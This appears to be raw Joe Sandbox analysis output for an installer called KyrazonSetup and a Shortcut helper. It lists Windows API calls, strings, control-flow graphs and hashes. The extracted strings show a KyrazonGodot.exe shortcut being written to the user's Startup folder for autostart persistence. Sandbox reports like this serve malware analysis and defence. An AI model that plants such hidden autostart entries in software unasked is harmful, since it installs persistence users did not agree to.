                                                                                      • Opcode Fuzzy Hash: a46a7b2256a3cf94146298450ac36a8ef4ab1670e4172636b82585cecf65f891
                                                                                      • Instruction Fuzzy Hash: 07015A72500609EBDF228F61CD09FDB3BA9EF55360F00402AF995A2191D778DA54DBA4
                                                                                      APIs
                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00448078,Error launching installer), ref: 00405668
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405675
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 00405652
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: aaef83747aa1b203b2a57743586283d67b6f7f696a6a6629dc51cceb7310efa5
                                                                                      • Instruction ID: dbacb55137c0e446f5e74d91210fb43b788ebff64a81b2029776477596ab8b01
                                                                                      • Opcode Fuzzy Hash: aaef83747aa1b203b2a57743586283d67b6f7f696a6a6629dc51cceb7310efa5
                                                                                      • Instruction Fuzzy Hash: DAE092B4610209BFEB109BA4EE09F7B7AADEB10604F514425B914E2190EA7598189A7C
                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAE
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405AC6
                                                                                      • CharNextA.USER32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AD7
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405CF9,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                      • Instruction ID: 2b94cf21fc0d9439dbab8b822db930a3447ea2d2cb1db815078a5a090280caf9
                                                                                      • Opcode Fuzzy Hash: 63752835767028d7570d3bd2c367202728d3e51619cdcd0ff30af86384407b43
                                                                                      • Instruction Fuzzy Hash: 6DF0C231201918AFCB02DBA8CD4099FBBA8EF06350B2540B9E841F7211D674EE01AFA9

                                                                                      Execution Graph

                                                                                      Execution Coverage:6%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:0.8%
                                                                                      Total number of Nodes:621
                                                                                      Total number of Limit Nodes:23

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeUninitialize
                                                                                      • String ID: Arguments=%s$ArgumentsExpanded=%s$Calling CoInitialize()$Calling CoUninitialize()$Description=%s$Exiting with result code [%i]$HOTKEYF_ALT: [%i], HOTKEYF_CONTROL: [%i], HOTKEYF_EXT: [%i], HOTKEYF_SHIFT: [%i]$HRESULT_CODE(ResultCode): [%i]$HotKey=%i (%s)$IconLocation=%s,%i$IconLocationExpanded=%s,%i$RunStyle=%i$SelectedMode: [%i]$ShellLinkCreate() returned [%i]$ShellLinkQuery() returned [%i]$System error %i has occurred.$TargetPath=%s$TargetPathExpanded=%s$The command completed successfully.$The parameter "%s" is invalid.The syntax of the command is incorrect.$WorkingDirectory=%s$WorkingDirectoryExpanded=%s$[%s]$szIconLocation: [%s], iIconIndex: [%i]$wHotKey: [%i]$*undefined*$*undefined*$-help$/A:$/D:$/F:$/H:$/I:$/MegaDeth$/P:$/R:$/T:$/W:$/help$C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
                                                                                      • API String ID: 3442037557-4155593404
                                                                                      • Opcode ID: cd8161645067e630dad6a5539a586d8c68069ecbf6e443173d7559f8e8043637
                                                                                      • Instruction ID: 4cec52f0b69b802efb3a464ec667cbab768a5943839b9d430e7b4baeac5de826
                                                                                      • Opcode Fuzzy Hash: cd8161645067e630dad6a5539a586d8c68069ecbf6e443173d7559f8e8043637
                                                                                      • Instruction Fuzzy Hash: 3A524571B4020047DB2896759D46A6B76C5AB84325F28073FFC1AB32D2EEFDDD04869D

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00408150,00000000,00000001,00408140,00000000,6E696665), ref: 0040217A
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk,000000FF,?,00000104), ref: 0040237C
                                                                                      Strings
                                                                                      • IPersistFile::SaveCompleted() failed with [%i], xrefs: 004023E1
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk, xrefs: 00402373
                                                                                      • IShellLink::SetShowCmd() failed with [%i], xrefs: 00402298
                                                                                      • CoCreateInstance() returned [%d], xrefs: 0040218C
                                                                                      • IShellLink::SetPath() failed with [%i], xrefs: 004021F0
                                                                                      • C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe, xrefs: 004021D5
                                                                                      • IShellLink::SetDescription() failed with [%i], xrefs: 00402350
                                                                                      • IShellLink::SetHotkey() failed with [%i], xrefs: 00402316
                                                                                      • IShellLink::SetIconLocation() failed with [%i], xrefs: 004022D9
                                                                                      • IShellLink::QueryInterface() returned [%d], xrefs: 004021BC
                                                                                      • IShellLink::SetArguments() failed with [%i], xrefs: 00402226
                                                                                      • IPersistFile::Save() failed with [%i], xrefs: 004023A7
                                                                                      • IShellLink::SetWorkingDirectory() failed with [%i], xrefs: 0040225C
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                                      • String ID: CoCreateInstance() returned [%d]$IPersistFile::Save() failed with [%i]$IPersistFile::SaveCompleted() failed with [%i]$IShellLink::QueryInterface() returned [%d]$IShellLink::SetArguments() failed with [%i]$IShellLink::SetDescription() failed with [%i]$IShellLink::SetHotkey() failed with [%i]$IShellLink::SetIconLocation() failed with [%i]$IShellLink::SetPath() failed with [%i]$IShellLink::SetShowCmd() failed with [%i]$IShellLink::SetWorkingDirectory() failed with [%i]$C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
                                                                                      • API String ID: 123533781-1328962457
                                                                                      • Opcode ID: 8a8901c6ce573155238bfe9ba605f3272a4ca4f40b13b7891484f1c13e31722e
                                                                                      • Instruction ID: 446fe51c5131944fafe0983fb7adff54cf9e32d93924186f7a6edebb0ffc769c
                                                                                      • Opcode Fuzzy Hash: 8a8901c6ce573155238bfe9ba605f3272a4ca4f40b13b7891484f1c13e31722e
                                                                                      • Instruction Fuzzy Hash: DF71D271B40222ABC610DB59DD89E9B77D4AF44B50F140179FA08FB3D0EAB8DC409BE9

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 308 4041bb-4041c5 309 4041c7-4041d2 GetCurrentProcess TerminateProcess 308->309 310 4041d8-4041ee 308->310 309->310 311 4041f0-4041f7 310->311 312 40422c-404240 call 404254 310->312 313 4041f9-404205 311->313 314 40421b-40422b call 404254 311->314 323 404252-404253 312->323 324 404242-40424c ExitProcess 312->324 316 404207-40420b 313->316 317 40421a 313->317 314->312 320 40420d 316->320 321 40420f-404218 316->321 317->314 320->321 321->316 321->317
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(+.@,?,004041A6,00000000,00000000,00000000,00402E2B,00000000), ref: 004041CB
                                                                                      • TerminateProcess.KERNEL32(00000000,?,004041A6,00000000,00000000,00000000,00402E2B,00000000), ref: 004041D2
                                                                                      • ExitProcess.KERNEL32 ref: 0040424C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID: +.@
                                                                                      • API String ID: 1703294689-3061987503
                                                                                      • Opcode ID: 2d429d929ea8a0b317f002e275b952974cda3d528bdaf8c8f98ac53763413882
                                                                                      • Instruction ID: 5536314daef21801047468bbd332fe2a45d2b29d39cfc402778ff2b632d0f2f8
                                                                                      • Opcode Fuzzy Hash: 2d429d929ea8a0b317f002e275b952974cda3d528bdaf8c8f98ac53763413882
                                                                                      • Instruction Fuzzy Hash: 5D0184B2744201DAD6106B95FFC4A5A7BA5FBD4390B10407FF650721E0CB789888CA1D
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 89c0238259bda3cfb8336a94d97ebaaa58a9a963f60f6fc3d6d598877c13e167
                                                                                      • Instruction ID: 3d60e96441c5061d7fe8783f23e6a381593ab39bf64455fbaf2fe5d712ed1a1c
                                                                                      • Opcode Fuzzy Hash: 89c0238259bda3cfb8336a94d97ebaaa58a9a963f60f6fc3d6d598877c13e167
                                                                                      • Instruction Fuzzy Hash: 893292B1D04249AADF24CFA8C5487AEBFB8AF0431AF14807BD851B62D1D77C9B41CB59

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 575 404b4a-404b68 HeapCreate 576 404ba0-404ba2 575->576 577 404b6a-404b77 call 404a02 575->577 580 404b86-404b89 577->580 581 404b79-404b84 call 405f68 577->581 582 404ba3-404ba6 580->582 583 404b8b call 4067b9 580->583 587 404b90-404b92 581->587 583->587 587->582 588 404b94-404b9a HeapDestroy 587->588 588->576
                                                                                      APIs
                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402DC9,00000000), ref: 00404B5B
                                                                                        • Part of subcall function 00404A02: GetVersionExA.KERNEL32 ref: 00404A21
                                                                                      • HeapDestroy.KERNEL32 ref: 00404B9A
                                                                                        • Part of subcall function 00405F68: HeapAlloc.KERNEL32(00000000,00000140,00404B83,000003F8), ref: 00405F75
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2507506473-0
                                                                                      • Opcode ID: 17fc14b2b0ee490da2abc08a22e18cba9d5a41ab53b1d009843be57efd4fbba3
                                                                                      • Instruction ID: c37ba0b62e725718b283f0108c969a86dae0ba7a96d42cb4502cdc696fecd27d
                                                                                      • Opcode Fuzzy Hash: 17fc14b2b0ee490da2abc08a22e18cba9d5a41ab53b1d009843be57efd4fbba3
                                                                                      • Instruction Fuzzy Hash: 82F09BB0A4530159EF206B70AE4672A36E4DB80795F20043FF745F81D0EF7CD494950D

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 589 40508b-405098 590 40509a-4050a0 589->590 591 4050af-4050b2 589->591 592 4050e1-4050e3 590->592 594 4050a2-4050ab call 406304 590->594 591->592 593 4050b4-4050ba 591->593 597 4050e5-4050e7 592->597 598 4050e8-4050eb 592->598 595 4050c4-4050c6 593->595 596 4050bc-4050c2 593->596 594->592 603 4050ad-4050ae 594->603 600 4050c7-4050cd 595->600 596->600 597->598 601 4050ee-4050f7 RtlAllocateHeap 598->601 600->601 604 4050cf-4050dd call 406ab1 600->604 605 4050fd-4050fe 601->605 604->605 608 4050df 604->608 608->601
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040506F,000000E0,0040505C,?,0040483B,00000100), ref: 004050F7
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: dd3db8fef11c01220ba402cd8664f8f9f55ff54d20bcd4e0f61341d511754d65
                                                                                      • Instruction ID: 5bc31aa35ac4668d3eeac07d16caf22c06a3e39f42864eaa2c0d9096b0519aee
                                                                                      • Opcode Fuzzy Hash: dd3db8fef11c01220ba402cd8664f8f9f55ff54d20bcd4e0f61341d511754d65
                                                                                      • Instruction Fuzzy Hash: CFF081329159209BEA306714AD8079F6754EB01720F264137FC91FB2D1CA78AC958ECD

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 820 406ddd-406de8 821 406dea-406df9 LoadLibraryA 820->821 822 406e2c-406e33 820->822 825 406e62-406e64 821->825 826 406dfb-406e10 GetProcAddress 821->826 823 406e35-406e3b 822->823 824 406e4b-406e57 822->824 823->824 830 406e3d-406e44 823->830 827 406e5e-406e61 824->827 825->827 826->825 828 406e12-406e27 GetProcAddress * 2 826->828 828->822 830->824 831 406e46-406e49 830->831 831->824
                                                                                      APIs
                                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404ED5,?,Microsoft Visual C++ Runtime Library,00012010,?,004084A4,?,004084F4,?,?,?,Runtime Error!Program: ), ref: 00406DEF
                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00406E07
                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00406E18
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00406E25
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                      • API String ID: 2238633743-4044615076
                                                                                      • Opcode ID: e9e1d29084c3a61837c38555e13bb237a6bf8ab80c030ff43d0d697c62a3a1bb
                                                                                      • Instruction ID: da1cee133eb1f0aac0d6a5eb0433271fd4e1a8b91bcea41f29a9dc06e3078c45
                                                                                      • Opcode Fuzzy Hash: e9e1d29084c3a61837c38555e13bb237a6bf8ab80c030ff43d0d697c62a3a1bb
                                                                                      • Instruction Fuzzy Hash: 12012535A00311AFC711AFF5DE84A1B3ED99758790315443AB641F6291DEB8C8159BA8

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 707 402420-40251d CoCreateInstance 708 40252d-40252f 707->708 709 40251f-40252a call 4029c7 707->709 710 402535-402551 708->710 711 4028cc-4028d6 708->711 709->708 715 402561-402563 710->715 716 402553-40255e call 4029c7 710->716 718 4028b3-4028bf 715->718 719 402569-4025a4 MultiByteToWideChar 715->719 716->715 718->711 723 4028c1-4028cb 718->723 724 4025b4-4025b7 719->724 725 4025a6-4025b1 call 4029c7 719->725 726 4028a8-4028b2 724->726 727 4025bd-4025d4 724->727 725->724 726->718 732 4025e4-4025e6 727->732 733 4025d6-4025e1 call 4029c7 727->733 732->726 735 4025ec-402616 732->735 733->732 738 402626-40262e 735->738 739 402618-402623 call 4029c7 735->739 741 402630-402670 ExpandEnvironmentStringsA 738->741 742 402699-4026b2 738->742 739->738 741->742 744 402672-402697 741->744 746 4026b4-4026f4 ExpandEnvironmentStringsA 742->746 747 40271d-402733 742->747 744->742 746->747 748 4026f6-40271b 746->748 750 402735-40276f ExpandEnvironmentStringsA 747->750 751 402798-4027a9 747->751 748->747 750->751 752 402771-402796 750->752 754 4027b4-4027d2 751->754 755 4027ab-4027af 751->755 752->751 757 4027d4-40281d ExpandEnvironmentStringsA 754->757 758 402846-402857 754->758 755->754 757->758 759 40281f-402844 757->759 761 402864-40287f 758->761 762 402859-40285e 758->762 759->758 761->726 764 402881-4028a6 761->764 762->761 764->726
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00408150,00000000,00000001,00408140,?), ref: 0040250E
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk,000000FF,?,00000105), ref: 00402581
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000105), ref: 0040266C
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000105), ref: 004026F0
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000105), ref: 0040276B
                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000105), ref: 00402819
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk, xrefs: 0040242D, 00402578
                                                                                      • IShellLink::QueryInterface() returned [%d], xrefs: 00402554
                                                                                      • IShellLink::GetPath() returned [%d], xrefs: 00402619
                                                                                      • CoCreateInstance() returned [%d], xrefs: 00402520
                                                                                      • IShellLink::Resolve() returned [%d], xrefs: 004025D7
                                                                                      • C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe, xrefs: 00402652
                                                                                      • IPersistFile::Load() returned [%d], xrefs: 004025A7
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStrings$ByteCharCreateInstanceMultiWide
                                                                                      • String ID: CoCreateInstance() returned [%d]$IPersistFile::Load() returned [%d]$IShellLink::GetPath() returned [%d]$IShellLink::QueryInterface() returned [%d]$IShellLink::Resolve() returned [%d]$C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk

                                                                                      APIs
                                                                                      • MapVirtualKeyA.USER32(00000011,00000000), ref: 00401FFD
                                                                                      • GetKeyNameTextA.USER32(00000000), ref: 00402007
                                                                                      • MapVirtualKeyA.USER32(00000010,00000000), ref: 00402054
                                                                                      • GetKeyNameTextA.USER32(00000000), ref: 0040205E
                                                                                      • MapVirtualKeyA.USER32(00000012,00000000), ref: 004020AB
                                                                                      • GetKeyNameTextA.USER32(00000000), ref: 004020B5
                                                                                      • MapVirtualKeyA.USER32(00000000,00000000), ref: 004020EC
                                                                                      • GetKeyNameTextA.USER32(00000000,?,00000032), ref: 0040212C
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk, xrefs: 00401FA9
                                                                                      • KeyCode: [%i], Modifiers: [%i], xrefs: 00401FD3, 0040210A
                                                                                      • None, xrefs: 00402137
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: NameTextVirtual
                                                                                      • String ID: KeyCode: [%i], Modifiers: [%i]$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk$None

                                                                                      APIs
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402DEF), ref: 00404713
                                                                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402DEF), ref: 00404727
                                                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,00402DEF), ref: 00404753
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402DEF), ref: 0040478B
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00402DEF), ref: 004047AD
                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,00402DEF), ref: 004047C6
                                                                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,00402DEF), ref: 004047D9
                                                                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00404817
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmp
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                                      • String ID: -@

                                                                                      APIs
                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,004081F4,00000001,00000000,00000000,00000103,00000001,?,?,00405CFC,00200020,00000000,?,?,00000000), ref: 00403ECF
                                                                                      • LCMapStringA.KERNEL32(00000000,00000100,004081F0,00000001,00000000,00000000,?,00405CFC,00200020,00000000,?,?,00000000,00000001), ref: 00403EEB
                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,00200020,00405CFC,?,00000103,00000001,?,?,00405CFC,00200020,00000000,?,?,00000000), ref: 00403F34
